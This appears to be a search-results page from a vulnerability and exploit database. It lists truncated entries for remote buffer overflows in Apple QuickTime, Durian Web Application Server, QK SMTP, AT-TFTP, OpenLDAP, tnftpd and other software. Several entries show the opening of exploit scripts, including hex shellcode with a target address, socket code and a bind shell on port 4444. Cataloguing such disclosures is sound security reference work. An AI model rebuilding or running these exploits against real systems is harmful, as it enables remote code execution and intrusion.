2094 matches found
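Apple QuickTime RTSP URI Remote Buffer Overflow Vulnerability
Apple QuickTime is a popular media player. Apple QuickTime has a buffer overflow in its handling of RTSP URIs, which a remote attacker can exploit to execute arbitrary code with the privileges of the application process. The problem lies in the rtsp:// URL handler: by supplying a special string of the form rtsp:// random + colon + 299 bytes of padding and payload, and using HTML, JavaScript or a QTL file to get the user to parse it, an attacker can cause a stack-based buffer overflow, which can lead to arbitrary code execution. Apple QuickTime Player 7.1.3 No solution is currently available: http://www.apple.com/quicktime/ !/usr/bin/ruby...
Durian Web Application Server Remote Buffer Overflow Vulnerability
Durian Web Application Server is a web application server. Durian Web Application Server does not handle malformed requests correctly, and a remote attacker can exploit this to cause a denial of service or a buffer overflow in the application. Submitting an overly long request can cause a buffer overflow, and submitting a malformed request can display 1000 access violation dialog boxes, resulting in a denial of service. Durian Web Application Server 3.02 No solution is currently available: http://sourceforge.net/projects/durian/ //Durian Web Application Server 3.02 freeware f...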
Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow
!/usr/bin/python Port bind exploit for apple quicktime rtsp vulnerability Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy to port the exploit to others. All one needs to do is look for the appropriate jump address. Certain characters are not permitted in the shellcode...
QK SMTP 3.01 - RCPT TO Remote Buffer Overflow (2)
QK SMTP 3.01 - RCPT TO Remote Buffer Overflow 2 !/bin/perl https://www.securityfocus.com/bid/20681 tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit...
QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl)
Exploit for unknown platform in category remote exploits. QK SMTP = 3.01 RCPT TO Remote Buffer Overflow Exploit pl !/bin/perl http://www.securityfocus.com/bid/20681 tested on...
Durian Web Application Server 3.02 - Remote Buffer Overflow
Durian Web Application Server 3.02 - Remote Buffer Overflow http://sourceforge.net/projects/durian/ / errorreportingEALL; $address = "192.168.1.3"; $serviceport = "4002"; $shellcode = "\xeb\x1b". "\x5b". "\x31\xc0". "\x50". "\x31\xc0". "\x88\x43\x59". "\x53". "\xbb\x6d\x13\x86\x7c". //WinExec,...
Durian Web Application Server 3.02 Remote Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits. Durian Web Application Server 3.02 Remote Buffer Overflow Exploit http://sourceforge.net/projects/durian/ /...
Durian Web Application Server 3.02 - Remote Buffer Overflow
http://sourceforge.net/projects/durian/ / errorreportingEALL; $address = "192.168.1.3"; $serviceport = "4002"; $shellcode = "\xeb\x1b". "\x5b". "\x31\xc0". "\x50". "\x31\xc0". "\x88\x43\x59". "\x53". "\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d "\xff\xd3". "\x31\xc0". "\x50"...
KsIRC 1.3.12 - PRIVMSG Remote Buffer Overflow (PoC)
KsIRC 1.3.12 - PRIVMSG Remote Buffer Overflow PoC // KSirc 1.3.12 - PRIVMSG remote Buffer Overflow // PoC // // Federico L. Bossi Bonin // [email protected] // www.GlobalST.com.ar // 0 0xb7ea8792 in KSircIOController::stdoutread from /usr/kde/3.5/lib/libkdeinitksirc.so // 1 0xb7ea78c8 in...
OpenLDAP 2.4.3 - 'KBIND' Remote Buffer Overflow
/ openldap-kbind-p00f.c - OpenLDAP kbind remote exploit Only works on servers compiled with --enable-kbind enable LDAPv2+ Kerberos IV bind deprecated no by Solar Eclipse Shoutouts to LSD for their l33t asm code and to all 0dd people Private 0dd code. / include include include include include...
LS-20061001 - Computer Associates BrightStor ARCserve Backup v11.5 Remote Buffer Overflow Vulnerability
LS-20061001 LSsec has discovered a vulnerability in Computer Associates BrightStor ARCserve Backup v11.5, which could be exploited by an anonymous attacker in order to execute arbitrary code with SYSTEM privileges on an affected system. The flaw specifically exists within the Tape Engine...
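NetBSD Ftpd and Tnftpd Port Remote Buffer Overflow Vulnerability
tnftpd is a port of the NetBSD FTP server. NetBSD tnftpd has a remote stack overflow, which a remote attacker can exploit to execute arbitrary code with the privileges of the application process. To trigger the vulnerability, the attacker must create directories and use GLOB special characters such as the asterisk to overflow an internal stack buffer; carefully crafted submitted data may execute arbitrary code with the privileges of the process. tnftpd tnftpd 20040810 NetBSD NetBSD 3.0 No solution is currently available: http://freshmeat.net/projects/tnftpd !perl $$$ NetBSD ftpd and ports Remote ROOOOOT $HOLE$ $$$...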
AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl -w acaroatjervus.it http://www.securityfocus.com/bid/21320 [email protected] is credited with the discovery of this vulnerability use IO::Socket; if!$ARGV1 print "Uso: atftp-19.pl victim port\n\n"; exit; $victim = IO::Socket::INET-newProto='udp',...
Allied Telesyn TFTP (AT-TFTP) ServerDaemon 1.9 - Filename Remote Buffer Overflow
Allied Telesyn TFTP AT-TFTP ServerDaemon 1.9 - Filename Remote Buffer Overflow !/usr/bin/perl -w acaroatjervus.it https://www.securityfocus.com/bid/21320 [email protected] is credited with the discovery of this vulnerability use IO::Socket; if!$ARGV1 print "Uso: atftp-19.pl \n\n"; exit; $victim =...
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow
!/usr/bin/perl -w acaroatjervus.it https://www.securityfocus.com/bid/21320 [email protected] is credited with the discovery of this vulnerability use IO::Socket; if!$ARGV1 print "Uso: atftp-19.pl \n\n"; exit; $victim = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$ARGV1 or die "Cann...
Evince Document Viewer - 'DocumentMedia' Remote Buffer Overflow
/ Creator: K-sPecial xzziroz.net of .aware awarenetwork.org Name: evince-ps-field-bof.c Date: 11/27/2006 Version: 1.00 - creation Other: this idea originaly came from the bid for the 'gv' buffer overflow 20978, i don't believe it's known until now that evince is also vulnerable. Compile: gcc -o...
LS-20061113 - CA BrightStor ARCserve Backup Remote Buffer Overflow Vulnerability
LS-20061113 LSsec has discovered a vulnerability in Computer Associates BrightStor ARCserve Backup v11.5, which could be exploited by an anonymous attacker in order to execute arbitrary code with SYSTEM privileges on an affected system. The flaw specifically exists within the Tape Engine...
Novell Client 4.91 - NWSPOOL.dll Remote Buffer Overflow
Novell Client 4.91 - NWSPOOL.dll Remote Buffer Overflow // source: https://www.securityfocus.com/bid/21220/info Novell Client is prone to a remote buffer-overflow vulnerability. Successful exploits may result in a denial-of-service condition or arbitrary code execution. Remote, anonymous attacker...
proftpd -- remote code execution vulnerabilities
The proftpd development team reports that several remote buffer overflows had been found in the proftpd server...
WFTPD Pro Server 3.23.1.1 (APPE) Remote Buffer Overflow PoC
No description provided by source. !/usr/bin/env python import sys import struct import ftplib print "WFTPD Pro Server 3.23.1.1 Buffer Overflow Only a DOS currently, simple POC" print "Copyright c Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp = ftplib.FTP print "+...